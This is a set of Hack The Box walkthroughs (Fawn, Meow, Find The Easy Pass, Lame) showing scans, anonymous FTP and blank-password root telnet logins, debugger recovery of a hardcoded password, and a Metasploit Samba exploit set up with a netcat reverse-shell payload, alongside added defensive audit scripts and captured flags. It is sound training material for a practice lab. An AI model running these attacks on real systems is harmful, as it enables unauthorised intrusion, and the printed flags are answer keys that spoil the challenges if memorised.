Hack The Box: Machine – Fawn

Dear friend, welcome to haXez, and thank you for stopping by. Today we’re looking at the Hack The Box Machine Fawn. It’s a super easy box that requires you to enumerate the services on the box and then utilize those services to capture the flag. There are also a number of questions that you need to answer to own the machine.

Spawn Fawn

The first thing we need to do is to spawn an instance of the machine. However, a prerequisite of spawning the machine is connecting to the VPN. I’ve covered this before in my Meow walkthrough so have a look there if you don’t know where to start. Once you have connected and spawned a machine you will be given an IP address.

Ping The Thing

In order to check that we can communicate with the machine, we can use the tool ping to see if it responds to our ICMP packets. This can be run from the terminal by typing ping followed by the IP address of the box. As you can see from the output below, I sent four ping requests to the machine and it responded successfully.

┌──(kali㉿kali)-[~]
└─$ ping 10.129.247.20 
PING 10.129.247.20 (10.129.247.20) 56(84) bytes of data.
64 bytes from 10.129.247.20: icmp_seq=1 ttl=63 time=15.2 ms
64 bytes from 10.129.247.20: icmp_seq=2 ttl=63 time=14.3 ms
64 bytes from 10.129.247.20: icmp_seq=3 ttl=63 time=14.7 ms
64 bytes from 10.129.247.20: icmp_seq=4 ttl=63 time=14.9 ms
--- 10.129.247.20 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3004ms
rtt min/avg/max/mdev = 14.349/14.776/15.169/0.293 ms

A Lap With Nmap

Now that we know we can communicate with the Fawn machine, we need to enumerate what services the machine is running. We can do this using our favorite network mapping tool Nmap. It is good practice to throw some additional flags or arguments onto your Nmap scan in order to get as much information from the scan as possible. For this reason, we are going to tell Nmap to report back the service and operating system versions. The output below shows that the machine is running vsftpd version 3.0.3 and that the base operating system is Unix.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -p0- 10.129.247.20
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 12:36 EDT
Nmap scan report for 10.129.247.20
Host is up (0.017s latency).
Not shown: 65535 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=5/8%OT=21%CT=1%CU=37672%PV=Y%DS=2%DC=I%G=Y%TM=6277F198
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=103%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST11
OS:NW7%O6=M505ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%R
OS:UCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Unix
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.38 seconds

FTP Anonymity

FTP or File Transfer Protocol is a service that allows you to transfer files between a client and a server. There are many clients out there, including terminal and graphical based ones. One FTP misconfiguration that can be taken advantage of is the anonymous login feature. Anonymous login is just that: it allows you to log in anonymously. You don’t need to know the username or password of an existing user. You just have to specify anonymous as the username and submit anything for a password. If anonymous logins are supported then you will be granted access to the files on the FTP server. As you can see below, anonymous logins are supported by the server and we can log in and view the files using the dir command.

┌──(kali㉿kali)-[~]
└─$ ftp 10.129.60.207                                                           
Connected to 10.129.60.207.
220 (vsFTPd 3.0.3)
Name (10.129.60.207:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||43096|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
226 Directory send OK.
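The anonymous-login check above, written as an audit script. This is an added example and not code from the original walkthrough: the host and port passed to audit_anonymous are assumptions, and the sample listing is constructed from the dir output shown above. Parsing the listing tells you what an anonymous user could read or write, which is the finding a defender needs.

```python
"""Audit an FTP server for anonymous access and parse what an anonymous
user can see.  Added example, not part of the original walkthrough."""
import re
from dataclasses import dataclass
from ftplib import FTP, error_perm
from typing import List, Tuple

# UNIX-style LIST line as vsftpd returns it, e.g.
# "-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt"
LIST_RE = re.compile(
    r"^(?P<type>[-dl])(?P<perms>[rwxsStT-]{9})\s+\d+\s+"
    r"(?P<owner>\S+)\s+(?P<group>\S+)\s+(?P<size>\d+)\s+"
    r"(?P<month>\w{3})\s+(?P<day>\d{1,2})\s+(?P<yt>\S+)\s+(?P<name>.+)$"
)

@dataclass
class Entry:
    name: str
    is_dir: bool
    size: int
    owner: str
    world_readable: bool
    world_writable: bool

def parse_listing(lines: List[str]) -> List[Entry]:
    """Turn LIST output into Entry records; skips lines that do not match
    (status codes such as "150 Here comes the directory listing.")."""
    entries = []
    for line in lines:
        m = LIST_RE.match(line.strip())
        if not m:
            continue
        perms = m.group("perms")          # owner rwx | group rwx | other rwx
        entries.append(Entry(
            name=m.group("name"),
            is_dir=m.group("type") == "d",
            size=int(m.group("size")),
            owner=m.group("owner"),
            world_readable=perms[6] == "r",
            world_writable=perms[7] == "w",
        ))
    return entries

def findings(entries: List[Entry]) -> List[str]:
    """Describe what an anonymous user could do with each entry."""
    out = []
    for e in entries:
        if e.world_writable:
            out.append(f"{e.name}: world-writable (anonymous upload or overwrite possible)")
        elif e.world_readable and not e.is_dir:
            out.append(f"{e.name}: readable by anonymous ({e.size} bytes)")
    return out

def audit_anonymous(host: str, port: int = 21, timeout: int = 10) -> Tuple[bool, str, List[Entry]]:
    """Attempt an anonymous login and return (allowed, banner, entries).
    Assumption: host/port belong to a system you are authorised to assess."""
    ftp = FTP()
    banner = ftp.connect(host, port, timeout=timeout)   # e.g. "220 (vsFTPd 3.0.3)"
    try:
        ftp.login("anonymous", "anonymous@example.com")  # any password is accepted
    except error_perm:                                   # 530 Login incorrect etc.
        ftp.close()
        return False, banner, []
    lines: List[str] = []
    ftp.retrlines("LIST", lines.append)
    ftp.quit()
    return True, banner, parse_listing(lines)

# Constructed sample: the listing from the walkthrough plus a writable directory.
SAMPLE_LISTING = [
    "150 Here comes the directory listing.",
    "-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt",
    "drwxrwxrwx    2 0        0            4096 Jun 04  2021 upload",
    "226 Directory send OK.",
]

if __name__ == "__main__":
    for line in findings(parse_listing(SAMPLE_LISTING)):
        print(line)
```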

Grab The Flag

The Fawn FTP server appears to have a text file on it called flag.txt. Perhaps this is the elusive root flag that we need to capture. In order to download the flag we can use the get command. The get command allows you to download files from the server, and you can see an example of me using it to download the flag below.

ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||31037|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |*****************************************************************    32       21.00 KiB/s    00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (0.60 KiB/s)

Once the flag has been downloaded, you can use the cat command to view the contents of the file.

┌──(kali㉿kali)-[~]
└─$ cat flag.txt   
035db21c881520061c53e0536e44f815 

Fawn Questions And Answers

Before we can submit the root flag, there are a number of questions that we need to answer. I will run through these questions now.

Firstly, what does the 3-letter acronym FTP stand for? File Transfer Protocol


What communication model does FTP use, architecturally speaking? Client-Server Model


What is the name of one popular GUI FTP program? Filezilla


Which port is the FTP service active on usually? 21 TCP


What acronym is used for the secure version of FTP? SFTP


What is the command we can use to test our connection to the target? Ping


From your scans, what version is FTP running on the target? vsftpd 3.0.3


From your scans, what OS type is running on the target? Unix


Submit root flag

Hack The Box: Machine – Meow

Dear Friend, welcome to HaXeZ where today we’re looking at one of the Hack The Box Machines called Meow. This machine is part of the Tier 0 Starting Point boxes and is regarded as a very easy box. Additionally, there are a number of questions that you need to answer in order to complete this machine. First we need to connect to the VPN. In order to do that, click on the Starting Point link and download the OpenVPN files.


Connect To The Hack The Box VPN

Once you have the files downloaded, put them in your Virtual Machine’s shared folder. If you don’t know where that is then please see my guide on creating a virtual machine shared folder. Once the file is in your shared folder, boot your Virtual Machine and log in. Next you need to either navigate to the mount point of your shared folder or put the full file path in the following command.

┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/VPN]
└─$ ls
starting_point_HaXeZ.ovpn                                                                                                                                                                                    
┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/VPN]
└─$ sudo openvpn starting_point_HaXeZ.ovpn
2022-04-29 08:28:32 WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set.
---SNIP---
2022-04-29 08:41:55 Initialization Sequence Completed

You should now have successfully completed the first challenge.


Spawn The Machine

Further down the page you should see question two with an option to spawn the box. Click on the spawn the box link and it should do just that. Additionally, once the box has been spawned you should see an IP address. Essentially, this is the address for the box that we will use to communicate with it.


You can now probably answer the next few questions too. The next one should be what does the acronym VM stand for? The answer is Virtual Machine.


The next question is what tool do we use to interact with the operating system in order to start our VPN connection? That will be the terminal.


After that, it asks what is the abbreviated name for a tunnel interface in the output of your VPN boot-up sequence output? You can find this out by running ifconfig on your virtual machine. I’ve snipped out my eth0 and loopback interfaces and some other information, but you can see that the abbreviated name is tun.

┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/Machines/Meow]
└─$ ifconfig
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
inet 10.10.15.119  netmask 255.255.254.0  destination 10.10.15.119

Ping The Machine

Now that the box has been spawned and you know its address, it’s time to see whether we can talk to it. In order to do that we’re going to use the ‘ping’ command.

┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/Machines/Meow]
└─$ sudo ping 10.129.122.207 | tee -a ping.txt
PING 10.129.122.207 (10.129.122.207) 56(84) bytes of data.
64 bytes from 10.129.122.207: icmp_seq=1 ttl=63 time=15.6 ms

Which should now allow you to answer the next question which is what tool do we use to test our connection to the target? The answer is ping.


NMAP The Machine

Next we need to find out what services are available for us to talk to on the box. In order to do that we will use NMAP.

┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/Machines/Meow]
└─$ sudo nmap -sC -sV -p- 10.129.122.207 | tee -a nmap.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-29 08:42 EDT
Nmap scan report for 10.129.122.207
Host is up (0.036s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Furthermore, you should now be able to answer the next question, which is what is the name of the tool we use to scan the target’s ports? The answer is nmap.


Telnet To The Box

The results from the nmap scan showed us that port 23, or telnet, is open on the box. There were no other services listening, so we should attempt to connect to telnet to see what’s running. In order to do this we need to type the telnet command followed by the IP address and then the port. Include spaces between each entity.

┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/Machines/Meow]
└─$ sudo telnet 10.129.122.207 23
Trying 10.129.122.207...
Connected to 10.129.122.207.
Escape character is '^]'.

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█

Meow login: Administrator
Password: 
Login incorrect

After a bit of time waiting, we are greeted with an ASCII Hack The Box logo. This should allow you to answer the next question, which is what service do we identify on port 23/tcp during our scans? The answer is telnet.


Login To The Box

We now need to log in to the box but we don’t have any credentials. However, telnet is predominantly a Windows service, so we can try logging in with Administrator or admin, but those don’t work. However, if we try logging in as root with a blank password then we are successfully authenticated.

┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/Machines/Meow]
└─$ sudo telnet 10.129.122.207 23
Trying 10.129.122.207...
Connected to 10.129.122.207.
Escape character is '^]'.

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█

Meow login: Administrator
Password: 
Login incorrect
Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

After logging in we can see that the box is in fact Linux and running the Ubuntu operating system. We should now be able to answer the next question which is what username ultimately works with the remote management login prompt for the target. The answer is root.
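The misconfiguration behind that login is an account with an empty password field, which a defender can find by auditing /etc/shadow. This is an added example, not part of the original post; the shadow entries are constructed, and the root line mirrors what the Meow box allowed.

```python
"""Audit /etc/shadow-style entries for accounts reachable with an empty
password (and a few other weak states).  Added example; sample data is
constructed, not taken from the box."""
from dataclasses import dataclass
from typing import List

@dataclass
class ShadowFinding:
    user: str
    problem: str

# Constructed sample.  Field order: name:hash:lastchg:min:max:warn:inactive:expire:
SAMPLE_SHADOW = """\
root::18800:0:99999:7:::
daemon:*:18474:0:99999:7:::
joe:$6$saltsalt$abcdefghijklmnopqrstuvwxyz0123456789:18800:0:99999:7:::
legacy:$1$abc$xyz:18800:0:99999:7:::
svc:!:18800:0:99999:7:::
"""

def audit_shadow(text: str) -> List[ShadowFinding]:
    """Return one finding per account whose password field is unsafe."""
    findings: List[ShadowFinding] = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 2:
            continue                      # malformed line; nothing to judge
        user, pw = parts[0], parts[1]
        if pw == "":
            # Empty field: where PAM permits null passwords (nullok), any
            # login path such as telnet accepts the account with no password.
            findings.append(ShadowFinding(user, "empty password field"))
        elif pw.startswith(("!", "*")):
            continue                      # locked or password login disabled
        elif pw.startswith("$1$"):
            findings.append(ShadowFinding(user, "MD5-crypt hash; rehash with SHA-512 or yescrypt"))
        elif not pw.startswith("$"):
            findings.append(ShadowFinding(user, "legacy DES-crypt hash"))
    return findings

if __name__ == "__main__":
    for f in audit_shadow(SAMPLE_SHADOW):
        print(f"{f.user}: {f.problem}")
```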


Capture The Flag

Finally we now need to capture the flag. Fortunately they haven’t hidden it from us and we list out the directory we are currently in and see the file. Then all we need to do is cat that file and submit the flag to the web page.

Last login: Mon Sep  6 15:15:23 UTC 2021 from 10.10.14.18 on pts/0
root@Meow:~# ls
flag.txt  snap
root@Meow:~# cat flag.txt
b40abdfe23665f766f9c61ecba8a4c19
root@Meow:~#

And that’s it, you should now have pwned meow and can move on to the next box. Congratulations.


Find The Easy Pass has been Pwned!

Today we are continuing the Hack The Box Beginner Track with the Reversing Challenge Find The Easy Pass. Full disclaimer, I have little to almost no reverse engineering experience. I have looked at this challenge before and completed it but I didn’t understand what was going on. I did some assembly back in college but that was over a decade ago now and I’ve forgotten all of it.

So with that out the way, let’s get reversing.

First you need to head over to Hack The Box and download the files for this challenge.


That should download the file to your downloads directory or wherever you have it set. You need to extract the contents of the zip archive but it is password protected. The password is listed on the challenge and it is ‘hackthebox’. If you’re on Windows you should be able to double click the executable and run it right away. However, if you’re on Linux then you need to run it with emulation software like wine.


Now that the application is running, it’s a good idea to make a note of the strings you see displayed in the application. This can help track down locations in the program when it’s time to decompile it. The next thing to check is what happens when we submit data to the application.


Well we have failed, we have submitted the wrong password and the application is mocking us. So where do we go from here? Well we need a program that rips other programs to bits so we can see their insides. Take a look at my article on Ghidra if you haven’t already got it set up and installed. Let’s get reversing. With the .exe loaded in Ghidra it’s time to search for those strings we made note of earlier. The top menu has a search option. Click it, then click search for strings.


A new window should pop up with some options to refine the search. I kept the options as default and clicked search.


Once that is done, another window will pop up showing all the strings that Ghidra found in the code. There is a filter option at the bottom which you can use to refine the search even further. As we know from testing the application, the string ‘password’ was seen on the application. Let’s look for it.


Ok, we’re making slow but steady progress and that’s what we need to do in order to beat the rabbit right, or was it the hare? I hope all reversing doesn’t take this long. Next we need to double click on the row containing “Wrong Password” and that will take us to the location of that code section in the application.


The section of code has been highlighted in blue. You can see that we are currently looking at memory reference 00545200. If we right click the highlighted section and click on references, then show references to address, a new window will pop up showing the memory address.


You can see that the location is 00454144. If we double click that address again then it will take us back to the main window and the location of the next memory reference.


Lost? Yeah, don’t worry, it has taken me several attempts to get this far with reversing and I’m not ashamed to admit that I’ve read a number of walkthroughs. Now if you look at the top bar, there is a “hierarchical order” icon (only thing I could think to call it) next to the green play button. Click it to launch the function graph window. You should end up with a window looking like something below.


Now if you zoom in to the final 4 boxes you can see there is a bit of logic going on. The program has two different sections of code depending on the results. Essentially, this is an IF statement. If one condition is met then run the code in the first box (00454138), if not then run the code in the second box (00454144).


If we look in the box directly above the two, you can see the function (FUN_00404628) that determines which box is going to run next. If we click on the function number it should take us to where the function is being called. Make a note of the memory reference 00454131.


Then if you double click the function, it should take you to the IF statement in the main window where we can see what it’s doing. As you can see below, the application takes the values from param_1 and param_2 and stores them in EAX and EDX. Then further down you should see that the values of param_1 and param_2 are written to the stack using PUSH and compared using CMP. We can assume that, since this is checking whether the password is correct, one of these parameters contains the correct password.


So next we need to debug the program and check out what’s inside these parameters. To do this I am going to use ollydbg. If you need to install ollydbg you can do so from the CLI using ‘sudo apt-get install ollydbg’. Once the program is installed you can launch it by running ‘ollydbg’. Once ollydbg is running, click file, open and select EasyPass.exe.


With the program loaded in we need to find our memory reference. There is probably a way to search for memory references but I just scrolled through until I found it. Right click the reference and select breakpoint and click toggle.


Now if you click the play button to run the program, it will launch and ask you for the password. However, this time instead of checking whether the password is correct, it will halt, and you will be able to see the value that it is comparing it against. The image below shows our input of “test” and another value “fortran!”.


Now if we run the program again using wine, we can input the password to check to see whether it is correct, and it is. Congratulations you have completed the easiest reversing challenge there is. There are probably much easier ways to do this without using Ghidra but I wanted to check it out.
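Why the breakpoint handed over the password, shown as code. This is an added example, not the challenge’s own code: the vulnerable form mirrors what the walkthrough observed (the expected value is compared directly against the user’s input, so it must exist in the process), and the hardened form is the standard alternative of storing only a salted, slow hash and comparing in constant time. The literal fortran! is the value the post found; the salt and iteration count are assumptions.

```python
"""Hardcoded password comparison versus a salted-hash verifier.
Added example, not the Find The Easy Pass binary's own code."""
import hashlib
import hmac
import os
from typing import Optional

# --- vulnerable pattern: the secret itself lives in the program ------------
EMBEDDED_PASSWORD = "fortran!"      # value observed at the breakpoint in the post

def check_password_plain(candidate: str) -> bool:
    """The expected string is materialised in memory right before the
    compare, which is exactly what the debugger breakpoint exposed."""
    return candidate == EMBEDDED_PASSWORD

# --- hardened pattern: keep only a salted, slow hash -----------------------
ITERATIONS = 200_000                # PBKDF2 work factor (assumption)

def make_verifier(password: str, salt: Optional[bytes] = None) -> str:
    """Return 'pbkdf2_sha256$iterations$salthex$hashhex' for storage."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"

def check_password_hashed(candidate: str, stored: str) -> bool:
    """Recompute from the stored salt and compare in constant time; the
    program now carries no value that reads back as the password."""
    try:
        algo, iters, salt_hex, hash_hex = stored.split("$")
    except ValueError:
        return False                # malformed verifier string
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", candidate.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), hash_hex)

if __name__ == "__main__":
    verifier = make_verifier(EMBEDDED_PASSWORD)
    print(check_password_plain("test"), check_password_hashed("fortran!", verifier))
```

A hash only raises the cost of recovering a weak password from a binary the attacker holds; for anything that matters the check belongs on a server, not in the client.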


Check out some of my other posts including Archetype, Oopsie, Vaccine, Shield, Pathfinder, Included and Markup.

Lame has been Pwned!

I’m back once again doing Hack The Box machines. I have recently hacked all the Starting Point machines and am now moving on to the Beginner track. I’ve written a post on my experience with the Starting Point machines which you can read here.

Reconnaissance

The name of the machine I’m going to be looking at today and the first machine in the Beginner Track is Lame. As always, we start by checking to see whether the box is online and responding to pings.

[10.10.14.84]─[[email protected]]─[/media/sf_OneDrive/Hack The Box/Machines/Lame/Output]
└──╼ [★]$ sudo ping 10.129.81.166 | tee -a ping ping.lame.txt
[sudo] password for joe:
PING 10.129.81.166 (10.129.81.166) 56(84) bytes of data.
64 bytes from 10.129.81.166: icmp_seq=1 ttl=63 time=21.4 ms
64 bytes from 10.129.81.166: icmp_seq=2 ttl=63 time=20.4 ms

As you can see, the box is responding which means it’s safe to go ahead and run an nmap scan. I tell nmap to run safe checks, version checks and operating system identification on all ports. You can see the specific command and the output below.

[10.10.14.84]─[[email protected]]─[/media/sf_OneDrive/Hack The Box/Machines/Lame/Output]
└──╼ [★]$ sudo nmap -sC -sV -O -p0- 10.129.81.166 | tee -a nmap.lame.txt
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.84
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2021-09-15T14:40:20-04:00
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 40068/tcp): CLEAN (Timeout)
|   Check 2 (port 45806/tcp): CLEAN (Timeout)
|   Check 3 (port 54683/udp): CLEAN (Timeout)
|   Check 4 (port 34973/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 1h59m26s, deviation: 2h49m56s, median: -43s
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
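The Fawn and Lame scans above are read by eye; the same triage can be scripted so that anonymous FTP, cleartext services and the versions this post ties to public exploits are flagged automatically. This is an added example, not part of the original post: the sample scan is constructed from the Lame output above, and the KNOWN_WEAK table encodes only what the walkthrough itself states.

```python
"""Triage plain-text nmap -sC -sV output for findings a defender should act on.
Added example, not part of the original post."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)

@dataclass
class Port:
    port: int
    proto: str
    service: str
    version: str
    scripts: List[str] = field(default_factory=list)   # NSE lines under this port

def parse_nmap(text: str) -> Tuple[List[Port], List[str]]:
    """Group each port line with the '|'-prefixed NSE output beneath it and
    collect the host-level script results separately."""
    ports: List[Port] = []
    host_scripts: List[str] = []
    current: Optional[Port] = None
    in_host = False
    for raw in text.splitlines():
        line = raw.rstrip()
        if line.startswith("Host script results"):
            in_host, current = True, None
            continue
        m = PORT_RE.match(line)
        if m:
            current = Port(int(m.group("port")), m.group("proto"),
                           m.group("service"), m.group("version").strip())
            ports.append(current)
        elif line.startswith("|"):
            entry = line.lstrip("|_ ").strip()
            if in_host:
                host_scripts.append(entry)
            elif current is not None:
                current.scripts.append(entry)
        else:
            current = None   # "Service Info:" and similar end the port block
    return ports, host_scripts

KNOWN_WEAK = {   # version substring -> why it matters, as stated in the walkthrough
    "vsftpd 2.3.4": "vsftpd 2.3.4 backdoor (CVE-2011-2523)",
    "Samba smbd 3.0.20": "Samba 3.0.20 'username map script' command execution",
}

def triage(ports: List[Port], host_scripts: List[str]) -> List[Tuple[Optional[int], str]]:
    """Return (port, reason) pairs; port is None for host-level findings."""
    out: List[Tuple[Optional[int], str]] = []
    for p in ports:
        if p.service in ("ftp", "telnet"):
            out.append((p.port, f"{p.service} carries credentials in cleartext"))
        if any("Anonymous FTP login allowed" in s for s in p.scripts):
            out.append((p.port, "anonymous FTP login allowed"))
        if p.service == "distccd":
            out.append((p.port, "distcc daemon exposed to the network"))
        for needle, why in KNOWN_WEAK.items():
            if needle in p.version:
                out.append((p.port, f"known-vulnerable version: {why}"))
    if any("message_signing: disabled" in s for s in host_scripts):
        out.append((None, "SMB message signing disabled"))
    return out

# Constructed sample, trimmed from the Lame scan in the post.
SAMPLE_SCAN = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
|      Control connection is plain text
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-security-mode: 
|   account_used: <blank>
|_  message_signing: disabled (dangerous, but default)
"""

if __name__ == "__main__":
    for port, reason in triage(*parse_nmap(SAMPLE_SCAN)):
        print(f"{port if port is not None else 'host'}: {reason}")
```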

I’ve snipped out a bunch of the stuff we don’t need to see and have highlighted the areas which I think are of interest. Going down the list of results I see that port 21 (FTP) is open and is allowing anonymous logins. The first thing I did was to log in and check to see whether there were any files on there.

[10.10.14.84]─[[email protected]]─[/media/sf_OneDrive/Hack The Box/Machines/Lame/Output]
└──╼ [★]$ sudo ftp 10.129.81.166
Connected to 10.129.81.166.
220 (vsFTPd 2.3.4)
Name (10.129.81.166:joe): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> 

As you can see, there wasn’t anything interesting. I know that VSFTPD 2.3.4 has CVE-2011-2523 associated with it, which is a backdoor. The backdoor requires the user to log in with a smiley face and it grants them access. I attempted to do this but had no luck. I used the Metasploit module but that didn’t work, so it’s safe to say it’s patched. Moving on.

Foothold Hack

So from here we move on to the next ports in the list, 139 and 445 (Samba). I can see that the version of Samba is 3.0.20, so let’s check SearchSploit to see whether there are any known vulnerabilities for this particular version.

[10.10.14.84]─[[email protected]]─[/media/sf_OneDrive/Hack The Box/Machines/Lame/Output]
└──╼ [★]$ sudo searchsploit Samba 3.0.20
------------------------------------------
 Exploit Title                                                                                                                                              |  Path
------------------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                                                                                                      | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)                                                                            | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                                                                                                                       | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflow                                                                                                                       | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                                                                                               | linux_x86/dos/36741.py
------------------------------------------

As you can see from the output above, it looks like there is a command execution vulnerability and that there is a Metasploit module for it. Let’s launch Metasploit (using msfconsole) and see if we can find and use the module.

msf6 > search samba 3.0.20
Matching Modules
================
   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution

Ok we have found the exploit, we can select it by running ‘use 0’. Once we have the module loaded we can run ‘options’ to see what we need to populate the options with.

msf6 exploit(multi/samba/usermap_script) > options
Module options (exploit/multi/samba/usermap_script):
   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.129.81.166    yes       The target host(s), range CIDR identifier, 
   RPORT   139              yes       The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.84      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:

   Id  Name
   --  ----
   0   Automatic

It looks like we only have to set the RHOSTS option. The RHOSTS option is the setting you use to declare the IP address of the remote host. The RPORT is the remote port, as you can see it is targeting port 139. The LHOST and LPORT options are our localhost IP and port that we want the machine to connect back to. With all that configured, let’s run the ‘exploit’ command and see if it creates a session.

